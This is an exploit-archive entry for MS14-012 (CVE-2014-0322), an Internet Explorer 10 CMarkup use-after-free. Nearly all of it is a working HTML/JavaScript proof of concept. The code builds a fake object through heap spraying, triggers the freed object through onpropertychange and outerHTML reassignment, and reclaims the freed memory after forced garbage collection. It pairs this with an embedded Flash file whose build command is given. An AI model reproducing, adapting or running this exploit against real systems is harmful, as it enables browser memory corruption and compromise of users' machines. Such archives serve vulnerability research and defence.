MS14-012 Internet Explorer CMarkup Use-After-Free

2014-04-14T00:00:00
ID PACKETSTORM:126150
Type packetstorm
Reporter Jean-Jamil Khalife
Modified 2014-04-14T00:00:00

Description

                                        
                                            `<!--  
MS14-012 Internet Explorer CMarkup Use-After-Free  
Vendor Homepage: http://www.microsoft.com  
Version: IE 10  
Date: 2014-03-31  
Exploit Author: Jean-Jamil Khalife  
Tested on: Windows 7 SP1 x64 (fr, en)  
Flash versions tested: Adobe Flash Player (12.0.0.70, 12.0.0.77)  
Home: http://www.hdwsec.fr  
Blog : http://www.hdwsec.fr/blog/  
MS14-012 / CVE-2014-0322  
  
Generation:  
c:\mxmlc\bin>mxmlc.exe AsXploit.as -o AsXploit.swf  
  
E-DB Note: http://www.exploit-db.com/sploits/32851-AsXploit.as  
  
-->  
  
<html>  
<head>  
</head>  
<body>  
  
<script>  
  
var g_arr = [];  
var arrLen = 0x250;  
  
function dword2data(dword)  
{  
var d = Number(dword).toString(16);  
while (d.length < 8)  
d = '0' + d;  
  
return unescape('%u' + d.substr(4, 8) + '%u' + d.substr(0, 4));  
}  
  
function eXpl()  
{  
var a=0;  
  
for (a=0; a < arrLen; a++) {  
g_arr[a] = document.createElement('div');  
}  
  
// Build a new object  
var b = dword2data(0x19fffff3);  
while (b.length < 0x360)  
{  
// mov eax,dword ptr [esi+98h]  
// ...  
// mov eax,dword ptr [eax+8]  
// and dword ptr [eax+2F0h],0FFFFFFBFh  
if (b.length == (0x98 / 2))  
{  
b += dword2data(0x1a000010);  
}  
// mov ecx,dword ptr [edx+94h]  
// mov eax,dword ptr [ecx+0Ch]  
else if (b.length == (0x94 / 2))  
{  
b += dword2data(0x1a111111);  
}  
// mov eax,dword ptr [edx+15Ch]  
// mov ecx,dword ptr [eax+edx*8]  
else if (b.length == (0x15c / 2))  
{  
b += dword2data(0x42424242);  
}  
else  
{  
b += dword2data(0x19fffff3);  
}  
}  
  
var d = b.substring(0, ( 0x340 - 2 )/2);  
  
// trigger  
try{  
this.outerHTML=this.outerHTML  
}  
catch(e){  
  
}  
  
CollectGarbage();  
  
// Replace freed object  
for (a=0; a < arrLen; a++)  
{  
g_arr[a].title = d.substring(0, d.length);  
}  
}  
  
// Trigger the vulnerability  
function trigger()  
{  
var a = document.getElementsByTagName("script");  
var b = a[0];  
b.onpropertychange = eXpl;  
var c = document.createElement('SELECT');  
c = b.appendChild(c);  
}  
  
  
  
</script>  
<embed src=AsXploit.swf width="10" height="10"></embed>  
</body>  
</html>  
  
  
`